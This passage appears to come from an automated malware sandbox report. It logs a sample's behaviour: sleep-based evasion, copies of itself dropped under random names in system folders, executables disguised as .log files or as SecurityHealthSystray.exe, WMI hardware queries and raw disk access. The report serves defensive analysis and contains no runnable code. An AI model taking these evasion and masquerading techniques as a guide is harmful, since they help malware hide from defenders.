                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598844
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598625
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598438
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 598110
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597594
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 597441
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596766
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596608
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596422
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 300000
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596297
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596186
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 596049
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595907
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595772
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595655
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595547
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595430
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 595204
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593563
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593454
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593329
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593188
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 593079
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592954
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592829
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592579
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592469
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592357
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592249
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592133
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 592029
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591870
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591704
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591446
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 591333
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\0eDO5Zbs.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeWindow / User API: threadDelayed 4042Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeWindow / User API: threadDelayed 413Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2735Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2199Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2372Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3036
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2552
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2814
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWindow / User API: threadDelayed 6628
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWindow / User API: threadDelayed 3044
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\QCzpQABH.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\lkEtgbYs.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\WWtOxrLm.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\eTZddqfc.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\oiVTRNgB.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\CEHidmAX.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\wMeJBGvi.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\oGDUNCaL.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\nluLvNRG.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\NslYNyvF.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\dGvExiJK.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\hJPUkngW.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\vSXJQEeZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\UdnONotd.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\NClzZRhR.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeDropped PE file which has not been started: C:\Users\user\Desktop\NnjhOJZu.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\ezCDhkaT.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\MGxYJULN.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeDropped PE file which has not been started: C:\Users\user\Desktop\xkMJxvqs.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599891s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599766s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599657s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599485s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599370s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599233s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -599125s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -100000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99765s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99656s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99547s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99437s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99328s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -99094s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -98984s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -98875s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -98765s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -98656s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -597656s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -597519s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -597391s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -597219s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 1136Thread sleep time: -597046s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 6276Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 4304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep count: 2735 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 34 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 2199 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 2372 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 3036 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 2552 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep count: 2814 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 8032Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 8116Thread sleep time: -30000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -25825441703193356s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -600000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -599844s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -599702s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 3052Thread sleep time: -14400000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598844s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598625s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598438s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -598110s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597766s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597594s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -597441s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596766s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596608s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596422s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 3052Thread sleep time: -900000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596297s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596186s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -596049s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595907s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595772s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595655s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595547s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595430s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595329s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -595204s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -100000s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99988s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99875s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99765s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99633s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99492s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99263s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -99062s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98943s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98812s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98703s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -98593s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593563s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593454s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593329s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593188s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -593079s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592954s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592829s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592704s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592579s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592469s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592357s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592249s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592133s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -592029s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591870s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591704s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591446s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 5428Thread sleep time: -591333s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 4628Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exe TID: 6392Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 4484Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\0eDO5Zbs.exe TID: 7424Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe TID: 8024Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe TID: 2124Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 6872Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 480Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Recovery\0eDO5Zbs.exe TID: 8016Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe TID: 1068Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe TID: 3748Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe TID: 884Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeThread delayed: delay time: 599891Jump to behavior
